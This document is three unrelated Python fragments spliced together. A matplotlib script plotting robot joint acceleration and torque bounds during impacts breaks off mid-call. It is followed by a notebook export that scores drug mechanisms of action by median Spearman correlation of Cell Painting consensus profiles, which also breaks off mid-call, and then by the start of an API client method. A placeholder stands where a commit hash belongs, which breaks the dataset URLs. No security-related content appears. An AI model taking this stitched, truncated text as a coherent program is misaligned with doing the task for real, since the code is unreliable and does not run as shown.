predict_delta_dq_upper_0 = loaded['predict_jointVelocityJump_upper'][:,0]
predict_delta_dq_upper_1 = loaded['predict_jointVelocityJump_upper'][:,1]
predict_delta_dq_upper_2 = loaded['predict_jointVelocityJump_upper'][:,2]
predict_delta_dq_upper_3 = loaded['predict_jointVelocityJump_upper'][:,3]
predict_delta_dq_upper_4 = loaded['predict_jointVelocityJump_upper'][:,4]
predict_delta_dq_upper_5 = loaded['predict_jointVelocityJump_upper'][:,5]
predict_delta_dq_lower_0 = loaded['predict_jointVelocityJump_lower'][:,0]
predict_delta_dq_lower_1 = loaded['predict_jointVelocityJump_lower'][:,1]
predict_delta_dq_lower_2 = loaded['predict_jointVelocityJump_lower'][:,2]
predict_delta_dq_lower_3 = loaded['predict_jointVelocityJump_lower'][:,3]
predict_delta_dq_lower_4 = loaded['predict_jointVelocityJump_lower'][:,4]
predict_delta_dq_lower_5 = loaded['predict_jointVelocityJump_lower'][:,5]
ddq_upper_bound_position_0 = loaded['ddqUpperBoundPosition'][:,0]
ddq_upper_bound_position_1 = loaded['ddqUpperBoundPosition'][:,1]
ddq_upper_bound_position_2 = loaded['ddqUpperBoundPosition'][:,2]
ddq_upper_bound_position_3 = loaded['ddqUpperBoundPosition'][:,3]
ddq_upper_bound_position_4 = loaded['ddqUpperBoundPosition'][:,4]
ddq_upper_bound_position_5 = loaded['ddqUpperBoundPosition'][:,5]
ddq_lower_bound_position_0 = loaded['ddqLowerBoundPosition'][:,0]
ddq_lower_bound_position_1 = loaded['ddqLowerBoundPosition'][:,1]
ddq_lower_bound_position_2 = loaded['ddqLowerBoundPosition'][:,2]
ddq_lower_bound_position_3 = loaded['ddqLowerBoundPosition'][:,3]
ddq_lower_bound_position_4 = loaded['ddqLowerBoundPosition'][:,4]
ddq_lower_bound_position_5 = loaded['ddqLowerBoundPosition'][:,5]
ddq_upper_bound_velocity_0 = loaded['ddqUpperBoundVelocity'][:,0]
ddq_upper_bound_velocity_1 = loaded['ddqUpperBoundVelocity'][:,1]
ddq_upper_bound_velocity_2 = loaded['ddqUpperBoundVelocity'][:,2]
ddq_upper_bound_velocity_3 = loaded['ddqUpperBoundVelocity'][:,3]
ddq_upper_bound_velocity_4 = loaded['ddqUpperBoundVelocity'][:,4]
ddq_upper_bound_velocity_5 = loaded['ddqUpperBoundVelocity'][:,5]
ddq_lower_bound_velocity_0 = loaded['ddqLowerBoundVelocity'][:,0]
ddq_lower_bound_velocity_1 = loaded['ddqLowerBoundVelocity'][:,1]
ddq_lower_bound_velocity_2 = loaded['ddqLowerBoundVelocity'][:,2]
ddq_lower_bound_velocity_3 = loaded['ddqLowerBoundVelocity'][:,3]
ddq_lower_bound_velocity_4 = loaded['ddqLowerBoundVelocity'][:,4]
ddq_lower_bound_velocity_5 = loaded['ddqLowerBoundVelocity'][:,5]
real_ddq_upper_bound_position_0 = loaded['real_ddqUpperBoundPosition'][:,0]
real_ddq_upper_bound_position_1 = loaded['real_ddqUpperBoundPosition'][:,1]
real_ddq_upper_bound_position_2 = loaded['real_ddqUpperBoundPosition'][:,2]
real_ddq_upper_bound_position_3 = loaded['real_ddqUpperBoundPosition'][:,3]
real_ddq_upper_bound_position_4 = loaded['real_ddqUpperBoundPosition'][:,4]
real_ddq_upper_bound_position_5 = loaded['real_ddqUpperBoundPosition'][:,5]
real_ddq_lower_bound_position_0 = loaded['real_ddqLowerBoundPosition'][:,0]
real_ddq_lower_bound_position_1 = loaded['real_ddqLowerBoundPosition'][:,1]
real_ddq_lower_bound_position_2 = loaded['real_ddqLowerBoundPosition'][:,2]
real_ddq_lower_bound_position_3 = loaded['real_ddqLowerBoundPosition'][:,3]
real_ddq_lower_bound_position_4 = loaded['real_ddqLowerBoundPosition'][:,4]
real_ddq_lower_bound_position_5 = loaded['real_ddqLowerBoundPosition'][:,5]
real_ddq_upper_bound_velocity_0 = loaded['real_ddqUpperBoundVelocity'][:,0]
real_ddq_upper_bound_velocity_1 = loaded['real_ddqUpperBoundVelocity'][:,1]
real_ddq_upper_bound_velocity_2 = loaded['real_ddqUpperBoundVelocity'][:,2]
real_ddq_upper_bound_velocity_3 = loaded['real_ddqUpperBoundVelocity'][:,3]
real_ddq_upper_bound_velocity_4 = loaded['real_ddqUpperBoundVelocity'][:,4]
real_ddq_upper_bound_velocity_5 = loaded['real_ddqUpperBoundVelocity'][:,5]
real_ddq_lower_bound_velocity_0 = loaded['real_ddqLowerBoundVelocity'][:,0]
real_ddq_lower_bound_velocity_1 = loaded['real_ddqLowerBoundVelocity'][:,1]
real_ddq_lower_bound_velocity_2 = loaded['real_ddqLowerBoundVelocity'][:,2]
real_ddq_lower_bound_velocity_3 = loaded['real_ddqLowerBoundVelocity'][:,3]
real_ddq_lower_bound_velocity_4 = loaded['real_ddqLowerBoundVelocity'][:,4]
real_ddq_lower_bound_velocity_5 = loaded['real_ddqLowerBoundVelocity'][:,5]
real_ddq_upper_bound_tau_0 = loaded['real_ddqUpperBoundTau'][:,0]
real_ddq_upper_bound_tau_1 = loaded['real_ddqUpperBoundTau'][:,1]
real_ddq_upper_bound_tau_2 = loaded['real_ddqUpperBoundTau'][:,2]
real_ddq_upper_bound_tau_3 = loaded['real_ddqUpperBoundTau'][:,3]
real_ddq_upper_bound_tau_4 = loaded['real_ddqUpperBoundTau'][:,4]
real_ddq_upper_bound_tau_5 = loaded['real_ddqUpperBoundTau'][:,5]
real_ddq_lower_bound_tau_0 = loaded['real_ddqLowerBoundTau'][:,0]
real_ddq_lower_bound_tau_1 = loaded['real_ddqLowerBoundTau'][:,1]
real_ddq_lower_bound_tau_2 = loaded['real_ddqLowerBoundTau'][:,2]
real_ddq_lower_bound_tau_3 = loaded['real_ddqLowerBoundTau'][:,3]
real_ddq_lower_bound_tau_4 = loaded['real_ddqLowerBoundTau'][:,4]
real_ddq_lower_bound_tau_5 = loaded['real_ddqLowerBoundTau'][:,5]
predict_ddq_upper_bound_tau_0 = loaded['predict_ddqUpperBoundTau'][:,0]
predict_ddq_upper_bound_tau_1 = loaded['predict_ddqUpperBoundTau'][:,1]
predict_ddq_upper_bound_tau_2 = loaded['predict_ddqUpperBoundTau'][:,2]
predict_ddq_upper_bound_tau_3 = loaded['predict_ddqUpperBoundTau'][:,3]
predict_ddq_upper_bound_tau_4 = loaded['predict_ddqUpperBoundTau'][:,4]
predict_ddq_upper_bound_tau_5 = loaded['predict_ddqUpperBoundTau'][:,5]
ddq_0 = loaded['ddq'][:, 0]
ddq_1 = loaded['ddq'][:, 1]
ddq_2 = loaded['ddq'][:, 2]
ddq_3 = loaded['ddq'][:, 3]
ddq_4 = loaded['ddq'][:, 4]
ddq_5 = loaded['ddq'][:, 5]
predict_ddq_lower_bound_tau_0 = loaded['predict_ddqLowerBoundTau'][:,0]
predict_ddq_lower_bound_tau_1 = loaded['predict_ddqLowerBoundTau'][:,1]
predict_ddq_lower_bound_tau_2 = loaded['predict_ddqLowerBoundTau'][:,2]
predict_ddq_lower_bound_tau_3 = loaded['predict_ddqLowerBoundTau'][:,3]
predict_ddq_lower_bound_tau_4 = loaded['predict_ddqLowerBoundTau'][:,4]
predict_ddq_lower_bound_tau_5 = loaded['predict_ddqLowerBoundTau'][:,5]
y_bins = 4
x_bins = 14
fig4, (ax41, ax42, ax43, ax44, ax45, ax46) = plt.subplots(nrows=6, ncols=1, figsize=(12,6))
ax41 = plt.subplot(611)
ax41.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.plot(time, ddq_upper_bound_velocity_0, 'r--', label='Upper bound under impacts')
plt.plot(time, ddq_lower_bound_velocity_0, 'g--', label='Lower bound under impacts')
plt.plot(time, ddq_0, 'b', label='$\\ddot{q}_0$')
plt.plot(time, real_ddq_upper_bound_velocity_0, 'r', label='Upper bound')
plt.plot(time, real_ddq_lower_bound_velocity_0, 'g', label='Lower bound')
ax41.locator_params(nbins=6, axis='y')
ax41.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax41.get_xticklabels(), visible=False)
plt.grid(True)
plt.title("Converted joint velocity constraints [$radian/s^2$]")
plt.yticks(fontsize=10)
ax41.locator_params(nbins=y_bins, axis='y')
ax41.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1, handlelength=4 )
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
# ax41.autoscale(enable=True, axis='y')
ax41.set_ylim([-1500, 1500])
ax42 = plt.subplot(612)
plt.plot(time, ddq_upper_bound_velocity_1, 'r--')
plt.plot(time, ddq_lower_bound_velocity_1, 'g--')
plt.plot(time, ddq_1, 'b', label='$\\ddot{q}_1$')
plt.plot(time, real_ddq_upper_bound_velocity_1, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_1, 'g')
ax42.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax42.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax42.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax42.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax42.autoscale(enable=True, axis='y')
# ax42.set_ylim([-1200, 1200])
ax42.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax43 = plt.subplot(613)
plt.plot(time, ddq_upper_bound_velocity_2, 'r--')
plt.plot(time, ddq_lower_bound_velocity_2, 'g--')
plt.plot(time, ddq_2, 'b', label='$\\ddot{q}_2$')
plt.plot(time, real_ddq_upper_bound_velocity_2, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_2, 'g')
ax43.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax43.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax43.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax43.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax43.autoscale(enable=True, axis='y')
# ax43.set_ylim([-1600, 1500])
ax43.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax44 = plt.subplot(614)
plt.plot(time, ddq_upper_bound_velocity_3, 'r--')
plt.plot(time, ddq_lower_bound_velocity_3, 'g--')
plt.plot(time, ddq_3, 'b', label='$\\ddot{q}_3$')
plt.plot(time, real_ddq_upper_bound_velocity_3, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_3, 'g')
ax44.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax44.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax44.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax44.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax44.autoscale(enable=True, axis='y')
# ax44.set_ylim([-120000, 120000])
ax44.set_ylim([-1600, 1600])
ax44.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax45 = plt.subplot(615)
plt.plot(time, ddq_upper_bound_velocity_4, 'r--')
plt.plot(time, ddq_lower_bound_velocity_4, 'g--')
plt.plot(time, ddq_4, 'b', label='$\\ddot{q}_4$')
plt.plot(time, real_ddq_upper_bound_velocity_4, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_4, 'g')
ax45.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax45.autoscale(enable=True, axis='x', tight=True)
plt.setp(ax45.get_xticklabels(), visible=False)
plt.grid(True)
plt.yticks(fontsize=10)
ax45.locator_params(nbins=y_bins, axis='y')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax45.autoscale(enable=True, axis='y')
ax45.set_ylim([-1800, 3000])
ax45.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
ax46 = plt.subplot(616)
plt.plot(time, ddq_upper_bound_velocity_5, 'r--')
plt.plot(time, ddq_lower_bound_velocity_5, 'g--')
plt.plot(time, ddq_5, 'b', label='$\\ddot{q}_5$')
plt.plot(time, real_ddq_upper_bound_velocity_5, 'r')
plt.plot(time, real_ddq_lower_bound_velocity_5, 'g')
plt.xlabel('Time [s]')
ax46.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax46.autoscale(enable=True, axis='x', tight=True)
plt.grid(True)
plt.yticks(fontsize=10)
# ax46.set_ylabel('$\\ddot{q}_5$', **font)
ax46.locator_params(nbins=y_bins, axis='y')
ax46.locator_params(nbins=x_bins, axis='x')
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
ax46.autoscale(enable=True, axis='y')
ax42.set_ylim([-2200, 2200])
ax46.legend(loc='upper left', prop={'size':5}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 )
fig4.savefig("ddq_velocity_impact_bounds.pdf", bbox_inches='tight')
fig7 = plt.figure(figsize=(12,4))
lower_bound = -25*np.ones(len(ddq_5))
upper_bound = 25*np.ones(len(ddq_5))
y_bins = 8
x_bins = 14
ax71 = fig7.gca()
ax71.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
# plt.plot(time, predict_tauUpper[:,0], 'r--', label='Maximum torque under impacts')
# plt.plot(time, predict_tauLower[:,0], 'g--', label='Minimum torque under impacts')
# plt.plot(time, upper_bound - predict_tauUpper[:,0], 'r', label='Upper bound: Torque')
# plt.plot(time, lower_bound + predict_tauLower[:,0], 'g', label='Lower bound: Torque')
plt.plot(time, upper_bound, 'red', linestyle='-', label='Upper bound: $\overline{\\tau} $', linewidth=2.0)
plt.plot(time, lower_bound, 'darkslategrey', linestyle='-', label='Lower bound: $ \underline{\\tau} $', linewidth=2.0)
ax71.locator_params(nbins=y_bins, axis='y')
ax71.locator_params(nbins=x_bins, axis='x')
plt.setp(ax71.get_xticklabels(), visible=False)
plt.grid(True)
ax71.legend(frameon=False, loc='lower left', prop=fontP)
plt.title("Joint torque constraints [$Nm$]")
plt.yticks(fontsize=10)
ax71.locator_params(nbins=y_bins, axis='y')
plt.plot(time, tau[:,0], 'mediumblue', label='Torque: $\\tau_0 $')
plt.plot(time, tau[:,1], 'indigo', label='Torque: $\\tau_1 $')
plt.plot(time, tau[:,2], 'magenta', label='Torque: $\\tau_2 $')
plt.plot(time, tau[:,3], 'crimson', label='Torque: $\\tau_3 $')
plt.plot(time, tau[:,4], 'peru', label='Torque: $\\tau_4 $')
plt.plot(time, tau[:,5], 'darkorange', label='Torque: $\\tau_5 $')
ax71.legend(loc='upper left', prop={'size':6}, fancybox=True, framealpha=0.3, shadow=False, borderpad=1 , handlelength=4)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
ax71.set_ylim([-28, 28])
ax71.xaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.xlabel('Time [$s$]')
plt.setp(ax71.get_xticklabels(), visible=True)
ax71.autoscale(enable=True, axis='x', tight=True)
plt.grid(True)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
fig7.savefig("All_torque_impact_bounds.pdf", bbox_inches='tight')
fig7 = plt.figure(figsize=(6,2))
# fig8, (ax80, ax81) = plt.subplots(nrows=2, ncols=1)
# ax80 = plt.subplot(211)
ax80 = fig7.gca()
# set up subplot grid
gridspec.GridSpec(4,1)
# plt.subplot2grid((4,1), (0,0), colspan=1, rowspan=1)
plt.plot(time, ee_v[:,0], 'b', label='$v_{n}$')
plt.title("Contact velocity [$m/s$] ", fontsize=10)
ax80.autoscale(enable=True, axis='y', tight=True)
ax80.autoscale(enable=True, axis='x', tight=True)
plt.axvspan(impact_time_1[0], impact_time_1[1], color='red', alpha=0.1)
plt.axvspan(impact_time_2[0], impact_time_2[1], color='red', alpha=0.1)
plt.axvspan(impact_time_3[0], impact_time_3[1], color='red', alpha=0.1)
plt.axvspan(impact_time_4[0], impact_time_4[1], color='red', alpha=0.1)
plt.grid(True)
ax80.locator_params(nbins=6, axis='y')
plt.yticks(fontsize=10)
plt.xticks(fontsize=10)
# ax80.legend(prop={'size':6}, fancybox=True, framealpha=0.3, shadow=False, borderpad=2, handlelength=4 )
plt.xlabel('Time [s]', fontsize=10)
ax71.set_xlim([0, 1.2])
# plt.text(1.2, 0.16, r'$v_{n} = 0.163 m/s$',
# {'color': 'k', 'fontsize': 10, 'ha': 'center', 'va': 'center',
# 'bbox': dict(boxstyle="round", fc="w", ec="k", pad=0.2)})
plt.text(1.05, 0.155, r'$v_{n} = 0.155 m/s$',
{'color': 'k', 'fontsize': 10, 'ha': 'center', 'va': 'center',
'bbox': dict(boxstyle="round", fc="w", ec="k", pad=0.2)})
plt.annotate("", xy=(0.9, 0.155), xycoords='data',
xytext=(0.8, 0.155), textcoords='data',
arrowprops=dict(arrowstyle="<-", connectionstyle="arc3"))
fig7.savefig("contact_velocity.pdf", bbox_inches='tight')
# fig8.set_figheight(3)
# fig8.set_figwidth(10)
fig8 = plt.figure(figsize=(6,5))
lower =-200
upper = 200
lower_bound = lower*np.ones(len(ddq_5))
upper_bound = upper*np.ones(len(ddq_5))
# lower_bound = -25*np.ones(len(ddq_5))
# upper_bound = 25*np.ones(len(ddq_5))
y_bins = 8
x_bins = 12
ax81 = fig8.gca()
# plt.subplot2grid((4,1), (1,0), colspan=1, rowspan=3)
ax81.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
ax81.xaxis.set_major_formatter(FormatStrFormatter('%.1f'))
plt.plot(time, upper_bound, 'red', linestyle='-.', label='Upper bound: $\delta \overline{\\tau} $ ', linewidth=2.0)
plt.plot(time, lower_bound, 'darkslategrey', linestyle='-.', label=r'Lower bound: $\delta \underline{\tau}$ ', linewidth=2.0)
ax81.set_xlim([0, 1.2])
plt.setp(ax81.get_xticklabels(), | |
<gh_stars>1-10
#!/usr/bin/env python
# coding: utf-8
# ## Consensus Signatures
#
# A consensus signature can be defined as a perturbation-specific summary profile acquired by aggregating replicate level information.
#
# ### - Consensus Datasets
#
# 1. Median Aggregation
# - consensus_median (whole plate normalization)
# - consensus_median_dmso (dmso normalization).
#
#
#
#
#
# 2. Modified Z Score Aggregation (MODZ)
# - consensus_modz (whole plate normalization)
# - consensus_modz_dmso (dmso normalization)
#
# The first approach weights each replicate equally.
# The second approach weights replicates by average similarity to other replicates.
#
#
#
# ### The goal here:
# - is to determine the median score of each MOA (Mechanism of action) per dose based on taking the median of the correlation values between compounds of the same MOA.
#
#
#
#
#
# ### Note:
#
# To calculate the median score for each of the four consensus data, this notebook will have to be ran four times for each.
# In[1]:
import os
import pathlib
import pandas as pd
import numpy as np
from collections import defaultdict
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
import seaborn as sns
from pycytominer import feature_select
from statistics import median
import random
sns.set_style("darkgrid")
from scipy import stats
import pickle
from io import BytesIO
from urllib.request import urlopen
from zipfile import ZipFile
# In[2]:
def feature_selection(dataset_link):
"""
Perform feature selection by dropping columns with null or
only zeros values, and highly correlated values from the data.
params:
dataset_link: string of github link to the consensus dataset
Returns:
data: returned consensus dataframe
"""
data = pd.read_csv(dataset_link, compression='gzip', error_bad_lines=False)
cols = data.columns.tolist()
drop_cols = [x for x in cols if ((data[x].isnull().sum()) | all(y == 0.0 for y in data[x].values))]
data.drop(drop_cols, axis = 1, inplace = True)
data = feature_select(
data,
operation=["correlation_threshold", "variance_threshold", "blocklist"],
blocklist_file="https://raw.githubusercontent.com/broadinstitute/lincs-cell-painting/1769b32c7cef3385ccc4cea7057386e8a1bde39a/utils/consensus_blocklist.txt"
)
return data
# In[3]:
commit = "<PASSWORD>"
consensus_median_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_median.csv.gz?raw=true'
consensus_median_dmso_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_median_dmso.csv.gz?raw=true'
consensus_modz_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/spherized_profiles/consensus/2016_04_01_a549_48hr_batch1_dmso_spherized_profiles_with_input_normalized_by_dmso_consensus_modz.csv.gz?raw=true'
consensus_modz_dmso_link = f'https://github.com/broadinstitute/lincs-cell-painting/blob/{commit}/consensus/2016_04_01_a549_48hr_batch1/2016_04_01_a549_48hr_batch1_consensus_modz_dmso.csv.gz?raw=true'
# In[4]:
data = feature_selection(consensus_modz_link)
# In[5]:
data.shape
# In[6]:
data_dir = pathlib.Path("../../Profiles_level4/L1000/L1000_figshare_data")
os.listdir(data_dir) ##files in L1000 downloaded dataset
# ### Mechanism of actions (MOAs) - Alignment of L1000 and Cell Painting MOAs
#
# - Align the **L1000 pert_info meta_data** with the **Cell-painting meta_data** based on **broad id** and then further fill in some null values in cell painting MOA column with corresponding L1000 MOAs of the same broad sample id and do the same thing for the L1000 data, then take the L1000 moas as the one that will be used for further analysis (because it has the most distinct MOAs).
# In[7]:
def merge_align_moa(data_dir, cp_moa_link, data):
"""
This function aligns L1000 MOAs with the cell painting MOAs
and further fill null MOAs in one of the them (cell painting or L1000)
with another, so far they are of the same broad sample ID.
It also merge the aligned MOA metadata dataframe with the consensus data
based on 'broad_sample_id' and outputs the dataframe with MOAs and another one
where the broad samples has no MOAs (null moa values).
params:
data_dir: directory that contains L1000 files
cp_moa_link: github link to cell painting MOA metadata information .csv file
data: consensus dataframe
Returns:
data_moa: merged consensus dataframe with moas
no_moa_data: merged consensus dataframe without moas
"""
df_pertinfo_cp = pd.read_csv(cp_moa_link, sep="\t")
df_pertinfo_L1000 = pd.read_csv(os.path.join(data_dir, 'REP.A_A549_pert_info.txt'), delimiter = "\t")
df_pertinfo_L1000.rename(columns={"pert_id": "broad_id", "pert_iname": "pert_iname_L1000", "moa": "moa_L1000"},
inplace = True)
df_pertinfo_cp.rename(columns={"pert_iname": "pert_iname_cell_painting", "moa": "moa_cell_painting"},
inplace = True)
df_pertinfo = pd.merge(df_pertinfo_L1000, df_pertinfo_cp, on=['broad_id'], how='outer')
##fill NaNs moa_L1000, pert_iname_L1000, with corresponding values in cell_painting and VICE VERSA for Cell_Painting
df_pertinfo['moa_L1000'].fillna(value=df_pertinfo['moa_cell_painting'], inplace=True)
df_pertinfo['pert_iname_L1000'].fillna(value=df_pertinfo['pert_iname_cell_painting'], inplace=True)
df_pertinfo['moa_cell_painting'].fillna(value=df_pertinfo['moa_L1000'], inplace=True)
df_pertinfo['pert_iname_cell_painting'].fillna(value=df_pertinfo['moa_L1000'], inplace=True)
df_pertinfo = df_pertinfo[['broad_sample', 'broad_id', 'pert_iname_L1000', 'moa_L1000']].copy()
df_pertinfo.rename(columns={"pert_iname_L1000": "pert_iname", "moa_L1000":"moa", "broad_sample":'Metadata_broad_sample'},
inplace = True)
df_pertinfo['Metadata_broad_sample'].fillna('DMSO', inplace=True)
data_moa = data.merge(df_pertinfo, on='Metadata_broad_sample', how = 'outer')
no_moa_data = data_moa[data_moa['moa'].isnull()].copy().reset_index(drop = True)
data_moa.drop(data_moa[data_moa['moa'].isnull()].index, inplace = True)
data_moa.reset_index(drop= True, inplace = True)
for col in ['pert_iname', 'moa']:
data_moa[col] = data_moa[col].apply(lambda x: x.lower())
return data_moa, no_moa_data
# In[8]:
moa_dataset = "https://github.com/broadinstitute/lincs-cell-painting/blob/master/metadata/moa/repurposing_info_external_moa_map_resolved.tsv?raw=true"
df_all_moa, df_no_moa = merge_align_moa(data_dir, moa_dataset, data)
df_all_moa.loc[df_all_moa.Metadata_broad_sample == 'DMSO', "Metadata_dose_recode"] = 0
print(df_all_moa.shape)
df_all_moa.head()
# In[9]:
# Load common compounds
common_file = pathlib.Path("..", "..", "..", "6.paper_figures", "data", "significant_compounds_by_threshold_both_assays.tsv.gz")
common_df = pd.read_csv(common_file, sep="\t")
common_compounds = common_df.compound.unique().tolist()
print(len(common_compounds))
# In[10]:
# Only calculate using common compounds
df_moa = df_all_moa.query("pert_iname in @common_compounds")
df_moa.shape
# In[11]:
# How many total MOAs in common
moa_list = (
pd.DataFrame(
pd.concat([
pd.Series(x) for x in df_moa.moa.str.split("|")
])
.dropna(), columns=['moa']
)
)
moa_list.moa = moa_list.moa.str.lower()
moa_list = (
pd.DataFrame(
moa_list.moa.value_counts()
)
.reset_index()
.rename(columns={"moa": "compound_count", "index": "moa"})
)
print(moa_list.moa.nunique())
# In[12]:
# How many MOAs with greater than 3 compounds?
moa_list = moa_list.assign(num_unique_cpd=moa_list.compound_count / 6)
moa_list_subset = moa_list.query("num_unique_cpd > 3")
print(moa_list_subset.moa.nunique())
# In[13]:
df_no_moa.shape
# In[14]:
##list of "Broad samples" WITHOUT Mechanism of Actions (MOA) after aligning L1000 and Cell painting MOAs
df_no_moa['Metadata_broad_sample'].unique().tolist()
# ### Next:
#
# ### - Get Correlation (using Spearman coefficient) between compounds for all DOSES (1 - 6).
#
# ### - Then, Get the correlation values btw compounds of each particular MOA, and calculate the median from the correlation values.
#
# ## Recoding Dose Information
#
# The Drug Repurposing Hub collected data on 6 to 7 dose points per compound.
# In general, most doses are very near the following 7 dose points (mmoles per liter):
#
# > [0.04, 0.12, 0.37, 1.11, 3.33, 10, 20]
#
# Therefore, to make it easier to filter by dose when comparing compounds, we first align the doses collected in the dataset to their nearest dose point above.
# We then recode the dose points into ascending numerical levels and add a new metadata annotation `dose_recode` to the consensus signatures.
#
# | Dose | Dose Recode |
# | :--: | :---------: |
# | 0 (DMSO) | 0 |
# | ~0.04 | 1 |
# | ~0.12 | 2 |
# | ~0.37 | 3 |
# | ~1.11 | 4 |
# | ~3.33 | 5 |
# | ~10 | 6 |
# | ~20 | 7 |
# In[15]:
def get_median_score(moa_list, df_dose, df_cpd_agg):
"""
Get the correlation values between compounds of each MOA,
then calculate the median of these correlation values
and assign it as the "median score" of the MOA.
params:
moa_list: list of distinct moas for a particular dose
df_dose: merged consensus and moa dataframe of a partcular dose
df_dose_corr: merged consensus and moa dataframe of compound correlations of a particular dose
Returns:
moa_median_score: Dict with moa as the keys, and their median scores as the values
moa_cpds: Dict with moa as the keys, and the list of moa for each moa as the values
"""
moa_cpds = {}
moa_median_score = {}
for moa in moa_list:
cpds = df_dose['pert_iname'][df_dose['moa'] == moa].unique().tolist()
moa_cpds[moa] = cpds
##taking correlation btw cpds for each MOA
df_cpds = df_cpd_agg.loc[cpds]
cpds_corr = df_cpds.T.corr(method = 'spearman').values
if len(cpds_corr) == 1:
median_val = 1
else:
median_val = median(list(cpds_corr[np.triu_indices(len(cpds_corr), k = 1)]))
moa_median_score[moa] = median_val
return moa_median_score, moa_cpds
# In[16]:
def check_moa(moa_med_score, moa_cpds, df_moa):
"""
Check if all distinct moas in the moa_consensus dataframe (df_moa)
are in moa_med_score & moa_cpd, if not add them as keys and give them
a null value as the median score for moa_med_score and also as values for moa_cpds.
params:
moa_med_score: Dict with moa as the keys, and their size as the values
moa_cpds: Dict with moa as the keys, and the list of moa for each moa as the values
data_moa: merged consensus and moa df with moas
Returns:
moa_med_score: Dict with moa as the keys, and their size as the values
moa_cpds: Dict with moa as the keys, and the list of moa for each moa as the values
"""
moa_list = df_moa['moa'].unique().tolist()
moa_keys = moa_med_score.keys()
for moa in moa_list:
if moa not in moa_keys:
moa_med_score[moa] = np.nan
moa_cpds[moa] = np.nan
return moa_med_score, moa_cpds
# In[17]:
def get_moa_medianscores(df_moa):
"""
Generate a dataframe of distinct moas with their median scores and
corresponding list of compounds for different doses.
params:
df_moa: merged consensus and moa dataframe
Returns:
df_moa_med_score: dataframe of distinct moas with their corresponding median scores
and list of compounds for all doses.
"""
dose_list = list(set(df_moa['Metadata_dose_recode'].unique().tolist()))
print(dose_list)
for dose in dose_list:
df_dose = df_moa[df_moa['Metadata_dose_recode'] == dose].copy()
df_cpd_agg = df_dose.groupby(['pert_iname']).agg(['mean'])
df_cpd_agg.columns = df_cpd_agg.columns.droplevel(1)
df_cpd_agg.rename_axis(None, axis=0, inplace = True)
df_cpd_agg.drop(['Metadata_mmoles_per_liter', 'Metadata_dose_recode'], axis = 1, | |
url=url,
headers=headers)
response = self.send(request)
return response
#########################
# Download examples
#########################
def get_postman(self,
auth_type: str,
*,
token: str = None,
api_key: str = None,
username: str = None,
password: str = None,
